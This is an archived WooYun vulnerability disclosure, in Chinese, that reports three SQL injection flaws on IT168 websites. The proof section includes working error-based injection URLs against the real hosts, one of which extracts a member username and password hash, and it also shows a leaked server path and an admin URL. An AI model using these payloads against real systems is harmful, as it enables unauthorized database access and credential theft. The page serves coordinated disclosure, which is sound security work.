当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03550

漏洞标题:IT168几个SQL注射漏洞

相关厂商:IT168.com

漏洞作者: Jannock

提交时间:2011-12-06 13:38

修复时间:2012-01-05 13:39

公开时间:2012-01-05 13:39

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-12-06: 细节已通知厂商并且等待厂商处理中
2011-12-07: 厂商已经确认,细节仅向厂商公开
2011-12-17: 细节向核心白帽子及相关领域专家公开
2011-12-27: 细节向普通白帽子公开
2012-01-06: 细节向实习白帽子公开
2012-01-05: 细节向公众公开

简要描述:

IT168几个SQL注射漏洞

详细说明:

1、http://adshow.it168.com/admin2006/
用户名的地方存在SQL注入
2、http://answer.it168.com/answer_my.php?tid=63696
tid 存在注入
3、http://v.it168.com/comment/comment.php?action=vote&field=
field 存在注入

漏洞证明:

1、请求http://adshow.it168.com/admin2006/chkadmin.asp?username
取得路径
E:\ADSHOW\ADMIN2006\../include/check_Sql.asp,行 17
用户名:
a' and (select @@version)>0--
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
在将 nvarchar 值 'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换成数据类型 int 时失败。
/admin2006/chkadmin.asp,行 35
知道路径,也存在注入,backup shell没测试。
2、http://answer.it168.com/answer_my.php?tid=63696%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
Error: Duplicate entry '|5.1.37-log|1' for key 'group_key'
Errno.: 1062
3、http://v.it168.com/comment/comment.php?action=vote&field=content=0x7c%20where%20commentid=1%20%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20phpcms_member%20where%20groupid=1%20limit%203,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
MySQL Error : Duplicate entry '|IT168手机|e10adc3949ba59abbe56e057f20f883e|1' for key 'group_key'
后台路径存在
http://v.it168.com/admin.php
找到超管估计可以拿shell,没进一步测试。

修复方案:

懂得

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2011-12-07 14:43

厂商回复:

谢谢Jannock.

最新状态:

暂无


漏洞评价:

评论

  1. 2012-02-13 09:25 | IT168.com(乌云厂商)

    @Jannock 求联系方式

  2. 2012-02-13 09:41 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @IT168.com 短消息